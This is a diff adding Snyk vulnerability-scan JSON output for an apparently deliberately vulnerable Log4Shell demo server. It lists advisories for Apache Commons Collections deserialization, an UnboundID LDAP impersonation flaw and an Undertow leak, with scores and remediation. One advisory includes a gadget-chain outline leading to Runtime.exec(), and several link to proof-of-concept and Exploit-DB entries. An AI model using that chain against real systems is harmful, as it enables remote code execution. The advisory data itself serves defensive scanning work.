+ "ignore": {},
+ "pin": {}
+ },
+ "filesystemPolicy": false,
+ "filtered": {
+ "ignore": [],
+ "patch": []
+ },
+ "uniqueCount": 9,
+ "projectName": "io.snyk:log4shell-server",
+ "displayTargetFile": "pom.xml",
+ "hasUnknownVersions": false,
+ "path": "/Users/austindoll/Documents/GitHub/java-goof/log4shell-goof/log4shell-server"
+}
diff --git a/log4shell-goof/log4shell-server/result22.json b/log4shell-goof/log4shell-server/result22.json
new file mode 100644
index 0000000000..037aece4a3
--- /dev/null
+++ b/log4shell-goof/log4shell-server/result22.json
@@ -0,0 +1,1778 @@
+{
+ "vulnerabilities": [
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-30078",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.078866Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:46:27.924934Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:38.421377Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-4852](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-6056408)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n",
+ "epssDetails": {
+ "percentile": "0.88578",
+ "probability": "0.01844",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-7501"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2016-12-25T16:51:56Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3,3.2.2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": "transform"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:38.421377Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-472711",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[,3.2.2)"
+ ]
+ },
+ "exploit": "Proof of Concept",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "medium",
+ "cvssScore": 5.6,
+ "functions": [
+ {
+ "version": [
+ "[3.1, 3.22)",
+ "[,3.0-dev2)"
+ ],
+ "functionId": {
+ "filePath": "org/apache/commons/collections/functors/InvokerTransformer.java",
+ "className": "InvokerTransformer",
+ "functionName": ""
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/pull/18",
+ "title": "GitHub PR"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Ticket"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "cvssV3BaseScore": 7.3,
+ "modificationTime": "2024-03-11T09:52:35.761152Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:R",
+ "assigner": "Snyk",
+ "severity": "medium",
+ "baseScore": 5.6,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:03:34.698666Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
+ "assigner": "NVD",
+ "severity": "high",
+ "baseScore": 7.3,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:52:35.761152Z"
+ }
+ ],
+ "description": "## Overview\n\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data.\nVersions of commons-collections prior to `3.2.2` do not prevent deserialization of the class `org.apache.commons.collections.functors.InvokerTransformer`. This could be leveraged by an attacker as a gadget within a vulnerable application which deserializes user input to execute arbitrary code. \r\n\r\nVersions of commons-collections from 3.2.2 onwards will throw an `UnsupportedOperationException` error when attempts are made to deserialize InvokerTransformer instances to prevent potential remote code execution exploits.\r\n\r\n*Note:* `org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4` we recommend moving to the new artifact if possible.\r\n\r\n## PoC \r\n\r\n```\r\n/*\r\n\tGadget chain:\r\n\t\tObjectInputStream.readObject()\r\n\t\t\tAnnotationInvocationHandler.readObject()\r\n\t\t\t\tMap(Proxy).entrySet()\r\n\t\t\t\t\tAnnotationInvocationHandler.invoke()\r\n\t\t\t\t\t\tLazyMap.get()\r\n\t\t\t\t\t\t\tChainedTransformer.transform()\r\n\t\t\t\t\t\t\t\tConstantTransformer.transform()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tClass.getMethod()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.getRuntime()\r\n\t\t\t\t\t\t\t\tInvokerTransformer.transform()\r\n\t\t\t\t\t\t\t\t\tMethod.invoke()\r\n\t\t\t\t\t\t\t\t\t\tRuntime.exec()\r\n\tRequires:\r\n\t\tcommons-collections\r\n */\r\n```\n\n## Details\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\r\n\r\n \r\n\r\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\r\n\r\n \r\n\r\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\r\n\r\n \r\n\r\nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\r\n\r\n \r\n\r\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\r\n\r\n- Apache Blog\r\n\r\n \r\n\r\nThe vulnerability, also know as _Mad Gadget_\r\n\r\n> Mad Gadget is one of the most pernicious vulnerabilities we’ve seen. By merely existing on the Java classpath, seven “gadget” classes in Apache Commons Collections (versions 3.0, 3.1, 3.2, 3.2.1, and 4.0) make object deserialization for the entire JVM process Turing complete with an exec function. Since many business applications use object deserialization to send messages across the network, it would be like hiring a bank teller who was trained to hand over all the money in the vault if asked to do so politely, and then entrusting that teller with the key. The only thing that would keep a bank safe in such a circumstance is that most people wouldn’t consider asking such a question.\r\n\r\n- Google\n\n\n## Remediation\n\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n\n\n## References\n\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/5ec476b0b756852db865b2e442180f091f8209ee)\n\n- [GitHub PR](https://github.com/apache/commons-collections/pull/18)\n\n- [Jira Ticket](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n",
+ "epssDetails": {
+ "percentile": "0.82742",
+ "probability": "0.00880",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-6420"
+ ],
+ "CWE": [
+ "CWE-502"
+ ],
+ "GHSA": [
+ "GHSA-6hgm-866r-3cjv"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2019-10-10T18:31:03.943542Z",
+ "functions_new": [
+ {
+ "version": [
+ "[3.1, 3.22)",
+ "[,3.0-dev2)"
+ ],
+ "functionId": {
+ "className": "org.apache.commons.collections.functors.InvokerTransformer",
+ "functionName": ""
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2019-10-10T00:00:00Z",
+ "exploitDetails": {
+ "sources": [
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Proof of Concept",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Proof of Concept",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2020-02-24T00:00:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:52:35.761152Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "medium",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMMONSCOLLECTIONS-6056408",
+ "title": "Deserialization of Untrusted Data",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[3.0,3.2.2)"
+ ]
+ },
+ "exploit": "High",
+ "fixedIn": [
+ "3.2.2"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "commons-collections:commons-collections",
+ "references": [
+ {
+ "url": "http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/",
+ "title": "FoxGloveSecurity Blog"
+ },
+ {
+ "url": "https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://issues.apache.org/jira/browse/COLLECTIONS-580",
+ "title": "Jira Issue"
+ },
+ {
+ "url": "https://github.com/ianxtianxt/CVE-2015-7501",
+ "title": "PoC"
+ },
+ {
+ "url": "https://www.exploit-db.com/exploits/46628",
+ "title": "Exploit DB"
+ },
+ {
+ "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog",
+ "title": "CISA - Known Exploited Vulnerabilities"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:09:40.088365Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-11T09:54:13.273677Z"
+ }
+ ],
+ "description": "## Overview\n[commons-collections:commons-collections](https://mvnrepository.com/artifact/commons-collections/commons-collections) is a library which contains types that extend and augment the Java Collections Framework.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to execute arbitrary Java code with the `InvokerTransformer` serializable collections . The `sun.reflect.annotation.AnnotationInvocationHandler#readObject` method invokes `#entrySet` and `#get` on a deserialized collection. If an attacker has to ability to send serialized data (JMX, RMI, EJB) to an application using the `common-collections` library, it is possible to combine the aforementioned methods to execute arbitrary code on the application.\r\n\r\n`org.apache.commons:commons-collections` is no longer supported and has been moved to `org.apache.commons:commons-collections4`. We recommend moving to the new artifact if possible.\n\n**NOTE:** \r\n\r\nThis vulnerability has also been identified as: [CVE-2015-7501](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `commons-collections:commons-collections` to version 3.2.2 or higher.\n## References\n- [FoxGloveSecurity Blog](http://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/)\n- [GitHub Commit](https://github.com/apache/commons-collections/commit/e585cd0433ae4cfbc56e58572b9869bd0c86b611)\n- [Jira Issue](https://issues.apache.org/jira/browse/COLLECTIONS-580)\n- [PoC](https://github.com/ianxtianxt/CVE-2015-7501)\n- [Exploit DB](https://www.exploit-db.com/exploits/46628)\n- [CISA - Known Exploited Vulnerabilities](https://www.cisa.gov/known-exploited-vulnerabilities-catalog)\n",
+ "epssDetails": {
+ "percentile": "0.99697",
+ "probability": "0.96729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2015-4852"
+ ],
+ "CWE": [
+ "CWE-502"
+ ]
+ },
+ "packageName": "commons-collections:commons-collections",
+ "proprietary": false,
+ "creationTime": "2023-11-14T13:41:26.946764Z",
+ "functions_new": [],
+ "alternativeIds": [],
+ "disclosureTime": "2015-11-06T16:51:56Z",
+ "exploitDetails": {
+ "sources": [
+ "CISA",
+ "ExploitDB",
+ "Snyk"
+ ],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "High",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Attacked",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "commons-collections",
+ "artifactId": "commons-collections"
+ },
+ "publicationTime": "2015-11-06T16:51:56Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-06-03T08:53:26.834525Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "commons-collections:commons-collections@3.1"
+ ],
+ "upgradePath": [
+ false,
+ "commons-collections:commons-collections@3.2.2"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "commons-collections:commons-collections",
+ "version": "3.1"
+ },
+ {
+ "id": "SNYK-JAVA-COMUNBOUNDID-32143",
+ "title": "User Impersonation",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[,4.0.5)"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [
+ "4.0.5"
+ ],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "critical",
+ "cvssScore": 9.8,
+ "functions": [
+ {
+ "version": [
+ "[,4.0.5)"
+ ],
+ "functionId": {
+ "filePath": "com/unboundid/ldap/sdk/SimpleBindRequest.java",
+ "className": "SimpleBindRequest",
+ "functionName": "process"
+ }
+ }
+ ],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "com.unboundid:unboundid-ldapsdk",
+ "references": [
+ {
+ "url": "https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6",
+ "title": "GitHub Commit"
+ },
+ {
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-1000134",
+ "title": "NVD"
+ },
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1557531",
+ "title": "RedHat Bugzilla Bug"
+ }
+ ],
+ "cvssDetails": [
+ {
+ "assigner": "NVD",
+ "severity": "critical",
+ "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 9.8,
+ "modificationTime": "2024-03-11T09:47:19.854962Z"
+ },
+ {
+ "assigner": "Red Hat",
+ "severity": "high",
+ "cvssV3Vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
+ "cvssV3BaseScore": 7,
+ "modificationTime": "2024-03-11T09:49:40.956024Z"
+ }
+ ],
+ "cvssSources": [
+ {
+ "type": "primary",
+ "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "Snyk",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.1",
+ "modificationTime": "2024-03-06T14:02:05.592817Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
+ "assigner": "NVD",
+ "severity": "critical",
+ "baseScore": 9.8,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:47:19.854962Z"
+ },
+ {
+ "type": "secondary",
+ "vector": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
+ "assigner": "Red Hat",
+ "severity": "high",
+ "baseScore": 7,
+ "cvssVersion": "3.0",
+ "modificationTime": "2024-03-11T09:49:40.956024Z"
+ }
+ ],
+ "description": "## Overview\r\n[com.unboundid:unboundid-ldapsdk](https://github.com/pingidentity/ldapsdk) is a UnboundID LDAP SDK for Java.\r\n\r\nAffected version of this package are vulnerable to User Impersonation. The process function in the `SimpleBindRequest` class which check for empty password when running in synchronous mode.\r\n\r\n## Remediation\r\nUpgrade `com.unboundid:unboundid-ldapsdk` to version 4.0.5 or higher.\r\n\r\n## References\r\n- [RedHat Bugzilla Bug](https://bugzilla.redhat.com/show_bug.cgi?id=1557531)\r\n- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2018-1000134)\r\n- [GitHub Commit](https://github.com/pingidentity/ldapsdk/commit/8471904a02438c03965d21367890276bc25fa5a6)",
+ "epssDetails": {
+ "percentile": "0.80961",
+ "probability": "0.00729",
+ "modelVersion": "v2023.03.01"
+ },
+ "identifiers": {
+ "CVE": [
+ "CVE-2018-1000134"
+ ],
+ "CWE": [
+ "CWE-284"
+ ]
+ },
+ "packageName": "com.unboundid:unboundid-ldapsdk",
+ "proprietary": false,
+ "creationTime": "2018-03-16T00:00:00Z",
+ "functions_new": [
+ {
+ "version": [
+ "[,4.0.5)"
+ ],
+ "functionId": {
+ "className": "com.unboundid.ldap.sdk.SimpleBindRequest",
+ "functionName": "process"
+ }
+ }
+ ],
+ "alternativeIds": [],
+ "disclosureTime": "2018-03-16T00:00:00Z",
+ "exploitDetails": {
+ "sources": [],
+ "maturityLevels": [
+ {
+ "type": "secondary",
+ "level": "Not Defined",
+ "format": "CVSSv3"
+ },
+ {
+ "type": "primary",
+ "level": "Not Defined",
+ "format": "CVSSv4"
+ }
+ ]
+ },
+ "packageManager": "maven",
+ "mavenModuleName": {
+ "groupId": "com.unboundid",
+ "artifactId": "unboundid-ldapsdk"
+ },
+ "publicationTime": "2018-04-01T14:18:00Z",
+ "severityBasedOn": "CVSS",
+ "modificationTime": "2024-03-11T09:49:40.956024Z",
+ "socialTrendAlert": false,
+ "severityWithCritical": "critical",
+ "from": [
+ "io.snyk:log4shell-server@0.1.3",
+ "com.unboundid:unboundid-ldapsdk@3.1.1"
+ ],
+ "upgradePath": [
+ false,
+ "com.unboundid:unboundid-ldapsdk@4.0.5"
+ ],
+ "isUpgradable": true,
+ "isPatchable": false,
+ "name": "com.unboundid:unboundid-ldapsdk",
+ "version": "3.1.1"
+ },
+ {
+ "id": "SNYK-JAVA-IOUNDERTOW-7433721",
+ "title": "Memory Leak",
+ "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L",
+ "credit": [
+ "Unknown"
+ ],
+ "semver": {
+ "vulnerable": [
+ "[0,]"
+ ]
+ },
+ "exploit": "Not Defined",
+ "fixedIn": [],
+ "patches": [],
+ "insights": {
+ "triageAdvice": null
+ },
+ "language": "java",
+ "severity": "low",
+ "cvssScore": 2.3,
+ "functions": [],
+ "malicious": false,
+ "isDisputed": false,
+ "moduleName": "io.undertow:undertow-core",
+ "references": [
+ {
+ "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2274437",
+ "title": "Red Hat Bugzilla Bug"
+ },
+ {
+ "url": "https://access.redhat.com/errata/RHSA-2024:4392",
+ "title": "Red Hat Security Advisory"
+ },
+ {
+ "url": "https://github.com/undertow-io/undertow/blob/2.3.14.Final/core/src/main/java/io/undertow/Handlers.java%23L562",
+ "title": "Vulnerable Code"
+ }
+ ],
